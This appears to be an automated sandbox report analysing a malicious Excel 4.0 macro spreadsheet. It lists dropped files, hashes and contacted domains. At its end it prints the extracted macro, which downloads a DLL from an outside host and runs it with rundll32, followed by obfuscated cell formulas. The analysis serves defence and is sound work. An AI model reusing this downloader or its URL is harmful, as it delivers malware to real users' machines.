                              SHA-512:86E4516705380617A9F48B2E1CD7D9E676439398B802EB6047CD478D4B10BF8F4BA20E019F337B01761FA247CD631CCAB22851F078089C2E1C61574BCA9F5B98
                              Malicious:true
                              Reputation:low
                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Vt1..._..._..._......._...!..._.5."..._.5.2..._......._...^..._.5.1.C._.5.%..._.5.#..._.5.'..._.Rich.._.........................PE..L......C...........!................wq............@.....................................................................c.......<....`..`....................p..T...................................p...@...............`............................text............................... ..`.rdata..C...........................@..@.data...`d....... ..................@....rsrc...`....`......................@..@.reloc..~....p... ... ..............@..B........................................................................................................................................................................................................................................................................................................
                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dll
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:downloaded
                              Size (bytes):933888
                              Entropy (8bit):6.687983171155114
                              Encrypted:false
                              SSDEEP:24576:xTw7wGauFB4FU61kqTWJtknpwHfl1kKoop7:ih/FaU65TE1Hf9oI7
                              MD5:B0F3FA047F6AE39A145FD364F693638E
                              SHA1:1951696D8ACA4A31614BB68F9DA392402785E14E
                              SHA-256:0BF22B8F9AAEF21AFE71FCBBEA62325E7582DAD410B0A537F38A9EB8E6855890
                              SHA-512:86E4516705380617A9F48B2E1CD7D9E676439398B802EB6047CD478D4B10BF8F4BA20E019F337B01761FA247CD631CCAB22851F078089C2E1C61574BCA9F5B98
                              Malicious:true
                              Reputation:low
                              IE Cache URL:https://rnollg.com/kev/scfrd.dll
                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Vt1..._..._..._......._...!..._.5."..._.5.2..._......._...^..._.5.1.C._.5.%..._.5.#..._.5.'..._.Rich.._.........................PE..L......C...........!................wq............@.....................................................................c.......<....`..`....................p..T...................................p...@...............`............................text............................... ..`.rdata..C...........................@..@.data...`d....... ..................@....rsrc...`....`......................@..@.reloc..~....p... ... ..............@..B........................................................................................................................................................................................................................................................................................................
                              C:\Users\user\AppData\Local\Temp\B0EE0000
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):59780
                              Entropy (8bit):7.7698706955807175
                              Encrypted:false
                              SSDEEP:768:SwGBP++aB0WviH/WoTXZSzrSimIbCVpoWpgffXfQG:SwmW+aB3viH/WaI5xGVpoWpgF
                              MD5:5C7906A499CB652389B9D6862F96301E
                              SHA1:1F8A2FB35CCDDDD0DBF6A658446BDFF56C4C3CC8
                              SHA-256:DF88EFD4327B49EF6B6427E1CA6ABC6BDEDE6276E0EE36068A4AB73EA09E9C73
                              SHA-512:A38C555DAE246C5832FB54DAF384B03D271B833342B5CAAC4B988B88378CD77E5085326B4BF9C7C72B766BCABD099E8C7B1218AB21F8999854A2DB05B0D21ECE
                              Malicious:false
                              Reputation:low
                              Preview: ..n.0...'..".N...v.z.u.[.v.`.Cb...........U{n.....I.I...U.d..2zJX1"...H..).s.3?'..BK...S..O.g.?Ln..|.....:...R_..._..:.,.kE.?]E.(....G.3Z..@.<..d6...q..j.oo..&...sIjJ...*E.F.{".Y,T..wml]x.@H_...).SQ..@.qc...VW{..M........W.cs;."Vv[..S.....r|.....:%!.....m..]5.....eq.I.f.sX.....V..\i1o ......Q..J=.Nl..Su.L..P.......@....}..c$>>#.....3$>.".q......l...s...$cX..0.a.*.BU.....W...2,d.X....c!+.BV.....Y9..r,d.X...u....."k.a....r.].....u....*l..)....1F.^....{|H'.....x...N..L....cl.`.....T....\P....%j;..&...KB!.....m...........PK..........!..0O.&...........[Content_Types].xml ...(............................................................................................................................................................................................................................................................................................................................................................................................................
                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Jan 27 04:24:43 2021, atime=Wed Jan 27 04:24:43 2021, length=12288, window=hide
                              Category:dropped
                              Size (bytes):867
                              Entropy (8bit):4.470300585911857
                              Encrypted:false
                              SSDEEP:12:85QfLgXg/XAlCPCHaXgzB8IB/2OUo4X+WnicvbrubDtZ3YilMMEpxRljKnXcTdJU:85Q/XTwz6IIm4YeviDv3qVrNru/
                              MD5:0684FDE19BFC00ACDD5FACB9DF24C911
                              SHA1:9F9624971A7A5BFF82F8896F288CF77192D6BEE8
                              SHA-256:08F9DC31D9251117A507995BE3959865FD1FC1F3A8EC9412249A0021F097D112
                              SHA-512:DA0D34127A061940AF6DD39EBD56D98CF526AFEC242141EF4F2956CAA50D8FDBF435A6EFC10406C39D0123D1E9B5FC75011D60C58C0D4F5365DEFFB1C88AFD45
                              Malicious:false
                              Reputation:low
                              Preview: L..................F...........7G.....l......l....0......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....;R.+..Desktop.d......QK.X;R.+*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\066656\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......066656..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\case (166).LNK
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14 2020, mtime=Wed Jan 27 04:24:43 2021, atime=Wed Jan 27 04:24:43 2021, length=99328, window=hide
                              Category:dropped
                              Size (bytes):4056
                              Entropy (8bit):4.51571445846396
                              Encrypted:false
                              SSDEEP:96:8w/XLIksLNOq1VQh2w/XLIksLNOq1VQh2S/XLIksLNOq1VQh2S/XLIksLNOq1VQ/:8yIklIQEyIklIQEAIklIQEAIklIQ/
                              MD5:30E7EFDD04DC5E1D14F25F7DF13762FD
                              SHA1:9E7D46625ED41735CD67A5E520D44403A7770AF4
                              SHA-256:DD3C0511698ECB1CFF36A079CF5D0C504EBFFF90704FECBB89D836AEBE1099CC
                              SHA-512:3FD3308AEFD5EC793E4E82A44EF46BA47F8421BF2C21C5A43070EADEF8FA79B2217368224B4ED821384742041A0A1AA3A2D3267AEAB96E2090E3ADE7BDEA80ED
                              Malicious:false
                              Reputation:low
                              Preview: L..................F.... .....J..{.....l...Od.l................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2.*d..;R.+ .CASE(1~1.XLS..J.......Q.y.Q.y*...8.....................c.a.s.e. .(.1.6.6.)...x.l.s.......x...............-...8...[............?J......C:\Users\..#...................\\066656\Users.user\Desktop\case (166).xls.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.c.a.s.e. .(.1.6.6.)...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......066656..........D_....3N...W...9F.C...........[D_....3N...W...9F.C..
                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:ASCII text, with CRLF line terminators
                              Category:modified
                              Size (bytes):169
                              Entropy (8bit):4.440698811068057
                              Encrypted:false
                              SSDEEP:3:oyBVomMpFuYCeIdFuYCmMpFuYCeIdFuYCmMpFuYCeIdFuYCmMpFuYCv:dj6pFuY4FuYUpFuY4FuYUpFuY4FuYUp2
                              MD5:6EA362392A055C1873C0A3199650A172
                              SHA1:14D11AA54483C1DDB4767161573F791725CB612D
                              SHA-256:F58D57FE73BD127227A745DE13B7B7A7259DB69A88771DEB1EA8D183722FD3D0
                              SHA-512:08D4BAC636CA2AD4E0F67B837239C5B487105522F138CC776944032C02AA9FFC237BDC11C2C1C40D04CD933C81F5FBAC9D273FF2D796C7AF7ED8B674F81A0FC9
                              Malicious:false
                              Reputation:low
                              Preview: Desktop.LNK=0..[xls]..case (166).LNK=0..case (166).LNK=0..[xls]..case (166).LNK=0..case (166).LNK=0..[xls]..case (166).LNK=0..case (166).LNK=0..[xls]..case (166).LNK=0..
                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\9GI0R7W2.txt
                              Process:C:\Windows\SysWOW64\msiexec.exe
                              File Type:ASCII text
                              Category:downloaded
                              Size (bytes):117
                              Entropy (8bit):4.463713814275856
                              Encrypted:false
                              SSDEEP:3:GmM/P3/GGcxPKUzWvCo7w2lSN51V2fOWUTUIUnvPv:XM/nQyP9weEcAUvPv
                              MD5:2E300022FC078B63EDDA721753C0D406
                              SHA1:1659E4BF30AFDCAB025C7E6FE4BF96709635ACA6
                              SHA-256:161D203C1A6BF48E2917E07EFB5AFDB4F53C2F23D63094A63BE0705C117DCD12
                              SHA-512:49888E38F979B28FD8F576DB80276CA5EA1A5E211305AA0DE61395A1887667269B100E554158F89D6EE66279EB036AF37C200841CAA61711E12E4F97EF80A256
                              Malicious:false
                              Reputation:low
                              IE Cache URL:gadgetswolf.com/
                              Preview: __cfduid.d4004b2fa656ad149d3c281fe13cb30131611692753.gadgetswolf.com/.9728.1777262208.30870452.2128116109.30864493.*.
                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\VVPZM9EY.txt
                              Process:C:\Windows\SysWOW64\msiexec.exe
                              File Type:ASCII text
                              Category:downloaded
                              Size (bytes):119
                              Entropy (8bit):4.481534391542238
                              Encrypted:false
                              SSDEEP:3:GmM/oXdUHKEG4RVyKRv8KJpKfcSN0LFd1V2fP7UE3RnvPv:XM/oXdKhyKkv0/5cPQqvPv
                              MD5:218DC818EE1AF101ADBDED520019C4D1
                              SHA1:B1E1B3550E8CBD769B5531CF8E7DD23C387CFF1D
                              SHA-256:E64249F9608B271FC9F493C5CB5203CF02ACA125680800DD8EB0CAB41EA63928
                              SHA-512:A80232FEC18C665FDE0188A08B35FD0FB0A931F321B7662D1DE97F59053BC96A5B64E67DDBF9AEEC751130C317AE9F0E0615A2E8412A3519531D378FF177AF15
                              Malicious:false
                              Reputation:low
                              IE Cache URL:homesoapmolds.com/
                              Preview: __cfduid.dd2580b35fd1b568ac9dbf1f6c1f484301611692754.homesoapmolds.com/.9728.1787262208.30870452.2134512120.30864493.*.
                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\X2GDAG4X.txt
                              Process:C:\Windows\SysWOW64\msiexec.exe
                              File Type:ASCII text
                              Category:downloaded
                              Size (bytes):115
                              Entropy (8bit):4.4644860756744995
                              Encrypted:false
                              SSDEEP:3:GmM/QDCcvNvjGOYPwPUTKRvdAjMdl1cSCLFd1V2fI6UWW6dTRRnvPv:XM/QDCa2b2wqlVS5c5u6dTvPv
                              MD5:FAAC6CF3287C0D9FC6769DC6994929B0
                              SHA1:FE8F40563CFF355D4F9D56692F51F4F901925E79
                              SHA-256:86A99A90662AAE69461EB44BC6BD8C610BA5FDA12B0DECDFCDBEE83A776FD63B
                              SHA-512:B6A9537688B80FE95A760F91EBDA8BA12CFA499FB768D82B19AD2173431CE372C63CE1166441875E65BFB7D8D1ADA013E7ABF54EBA4B51E7BBB79BE4CAC36EF9
                              Malicious:false
                              Reputation:low
                              IE Cache URL:govemedico.tk/
                              Preview: __cfduid.d80efb969aed11158f209acabd61d60dc1611692754.govemedico.tk/.9728.1787262208.30870452.2141532133.30864493.*.
                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\ZEL5A6R0.txt
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:ASCII text
                              Category:downloaded
                              Size (bytes):112
                              Entropy (8bit):4.4460348970835355
                              Encrypted:false
                              SSDEEP:3:GmM/JgGdDBrRGVWYHUcIGT0cSNE+1V2e2OTmvXn:XM/9ddNGVWYHUnSGvTm/
                              MD5:465D769BE13DF75DFCC7B6A5D6584F39
                              SHA1:1A1DC7A24FCB846A5CCB3B06CC2C1297D471417F
                              SHA-256:4072FAAE99D34FF58B18F16AEC8FF206BC444D81522CB68120D9D449B189F065
                              SHA-512:64C1AB93675A7EDF4880EA8758EA4DB60912B792662FD002C1F1E4882617FC4B703E7904FE5DC89A7857C533B0BE3AF864D595075EB6D12955D6F6B90F2296C7
                              Malicious:false
                              Reputation:low
                              IE Cache URL:rnollg.com/
                              Preview: __cfduid.d441e3bff26bbc8fd1b56a1b9c560dff61611692720.rnollg.com/.9728.1447262208.30870452.3092370815.30864492.*.
                              C:\Users\user\AppData\Roaming\Ywmiu\egwih.dll
                              Process:C:\Windows\SysWOW64\msiexec.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):933888
                              Entropy (8bit):6.687983171155114
                              Encrypted:false
                              SSDEEP:24576:xTw7wGauFB4FU61kqTWJtknpwHfl1kKoop7:ih/FaU65TE1Hf9oI7
                              MD5:B0F3FA047F6AE39A145FD364F693638E
                              SHA1:1951696D8ACA4A31614BB68F9DA392402785E14E
                              SHA-256:0BF22B8F9AAEF21AFE71FCBBEA62325E7582DAD410B0A537F38A9EB8E6855890
                              SHA-512:86E4516705380617A9F48B2E1CD7D9E676439398B802EB6047CD478D4B10BF8F4BA20E019F337B01761FA247CD631CCAB22851F078089C2E1C61574BCA9F5B98
                              Malicious:false
                              Reputation:low
                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Vt1..._..._..._......._...!..._.5."..._.5.2..._......._...^..._.5.1.C._.5.%..._.5.#..._.5.'..._.Rich.._.........................PE..L......C...........!................wq............@.....................................................................c.......<....`..`....................p..T...................................p...@...............`............................text............................... ..`.rdata..C...........................@..@.data...`d....... ..................@....rsrc...`....`......................@..@.reloc..~....p... ... ..............@..B........................................................................................................................................................................................................................................................................................................
                              C:\Users\user\Desktop\A1EE0000
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:Applesoft BASIC program data, first line number 16
                              Category:dropped
                              Size (bytes):173366
                              Entropy (8bit):5.331125685153871
                              Encrypted:false
                              SSDEEP:3072:9xrtdAOtyoVlDGUUlEfblBiPP58Lml9i+aEdDhluaEdzY36DxrtdAOtyoVlDGUUv:9xrtdAOtyoVlDGUUlEfblBeP52ml9i+r
                              MD5:6FC2F1786F3A86691A5A8122FC5A52AF
                              SHA1:4E3DF6537A130B0BD9F2FF757FC7FAEE4FCFD60F
                              SHA-256:DC5196B6C4603AB51F4FC89F0E21377B5AC0276BF10841EF08ED48C51667786C
                              SHA-512:0D7B0211BF8FD6B7AACA3515CCDF9F6FEAD683681D8054E2C71E6F29AC0B1D397B819527548181EE1ADBE95A35DF1D5C7B603BD982DEA1EF1CE0887398271B1D
                              Malicious:false
                              Reputation:low
                              Preview: ........g2..........................\.p....user B.....a.........=.@............................................................... .....................................=........K.$8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.o.r.b.e.l.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.(.@...............C.o.r.b.e.l. .L.i.g.h.t.1.(.................C.o.r.b.e.l. .L.i.g.h.t.1...................C.a.l.i.b.r.i.1...@...,...........C.a.l.i.b.r.i.1.(.................C.o.r.b.e.l. .L.i.g.h.t.1.(.0...............C.o.r.b.e.l. .L.i.g.h.t.1.(.0...>...........C.o.r.b.e.l. .L.i.g.h.t.1.(.....>...........C.o.r.b.e.l. .L.i.g.h.t.1...................C.a.l.i.b.r.i.1.(.................C.o.r.b.e.l. .L.i.g.h.t.1...0...............C.a.

                              Static File Info

                              General

                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: , Last Saved By: , Name of Creating Application: Microsoft Excel, Last Printed: Tue Jan 26 16:17:13 2021, Create Time/Date: Thu Apr 23 13:26:24 2020, Last Saved Time/Date: Tue Jan 26 16:28:15 2021, Security: 0
                              Entropy (8bit):3.8739836669860748
                              TrID:
                              • Microsoft Excel sheet (30009/1) 78.94%
                              • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                              File name:case (166).xls
                              File size:156714
                              MD5:44b43922e08e0e8e1ec65300b3b1aa74
                              SHA1:ec1a847009295036381af1b0a4383a61c3dcbb75
                              SHA256:9b8516fcbe183de0a53ac47ea7f4289176e23fc82da1fe67c70cedc823f5dba6
                              SHA512:f54baff4c52037180433a6b246bbf773924327e8ebc641e7a896a2a7ee79ae4e9326984cbd646be73f9d5fa97f2b8e8e5e7628f277df70deb2cb9e7771f69356
                              SSDEEP:3072:49SUz4tH8vsderSh1yRNJd6zAtH8U5BXKjBPWlyTSgG+g1j:49SUz4tH8vsderSh1yRNJdaAtH8U5B6G
                              File Content Preview:........................>.......................0...........................-......./..........................................................................................................................................................................

                              File Icon

                              Icon Hash:e4eea286a4b4bcb4

                              Static OLE Info

                              General

                              Document Type:OLE
                              Number of OLE Files:1

                              OLE File "case (166).xls"

                              Indicators

                              Has Summary Info:True
                              Application Name:Microsoft Excel
                              Encrypted Document:False
                              Contains Word Document Stream:False
                              Contains Workbook/Book Stream:True
                              Contains PowerPoint Document Stream:False
                              Contains Visio Document Stream:False
                              Contains ObjectPool Stream:
                              Flash Objects Count:
                              Contains VBA Macros:False

                              Summary

                              Code Page:1251
                              Author:
                              Last Saved By:
                              Last Printed:2021-01-26 16:17:13
                              Create Time:2020-04-23 12:26:24
                              Last Saved Time:2021-01-26 16:28:15
                              Creating Application:Microsoft Excel
                              Security:0

                              Document Summary

                              Document Code Page:1251
                              Thumbnail Scaling Desired:False
                              Company:
                              Contains Dirty Links:False

                              Streams

                              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                              General
                              Stream Path:\x5DocumentSummaryInformation
                              File Type:data
                              Stream Size:4096
                              Entropy:0.843601759481
                              Base64 Encoded:False
                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . ( . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j S R F q S o B P w O . . . . . M a c r o 2 . . . . . M a c r o 3 . . . . . M a c r o 4 . . . . . M a c r o 5 . . . . . M a c r o 6 . . . . . M a c r o 7 . . . . . M a c r o 8 . . . . . M a c r o 9 . . . . .
                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 28 02 00 00 06 00 00 00 01 00 00 00 38 00 00 00 0f 00 00 00 40 00 00 00 0b 00 00 00 4c 00 00 00 10 00 00 00 54 00 00 00 0d 00 00 00 5c 00 00 00 0c 00 00 00 e7 01 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 00 00 00 00 0b 00 00 00
                              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                              General
                              Stream Path:\x5SummaryInformation
                              File Type:data
                              Stream Size:4096
                              Entropy:0.362148031008
                              Base64 Encoded:False
                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . . . . . . . @ . . . . . . g j . . . @ . . . . 9 . ? . . . . . . . . . . . . . . . . . . . . . . . .
                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 68 00 00 00 12 00 00 00 80 00 00 00 0b 00 00 00 98 00 00 00 0c 00 00 00 a4 00 00 00 0d 00 00 00 b0 00 00 00 13 00 00 00 bc 00 00 00 02 00 00 00 e3 04 00 00
                              Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 145752
                              General
                              Stream Path:Book
                              File Type:Applesoft BASIC program data, first line number 8
                              Stream Size:145752
                              Entropy:3.94377585798
                              Base64 Encoded:True
                              Data ASCII:. . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . . . . . . . . . . . . B . . . . . . . . . . . . . . . . . . . . . . . L G u P G w K V E D q c E . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . = . . . . . . . . Z . $ 8 .
                              Data Raw:09 08 08 00 00 05 05 00 04 3d cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 0e c0 ed e4 f0 e5 e9 20 c5 eb e8 f1 e5 e5 e2 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                              Macro 4.0 Code

                              CALL(URLMON, URLDownloadToFileA, "JJCCJJ", 0, "https://rnollg.com/kev/scfrd.dll", C:\ProgramData\BysKIez.dll, 0, 0)
                              CALL(Shell32, ShellExecuteA, "JJCCCCJ", 0, Open, "rundll32.exe", C:\ProgramData\BysKIez.dll, DllRegisterServer", 0, 0)
                              
                              ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=CHAR($FJ$1168-11),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=RUN($HL$1475),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=RUN($GW$1647),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,84,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,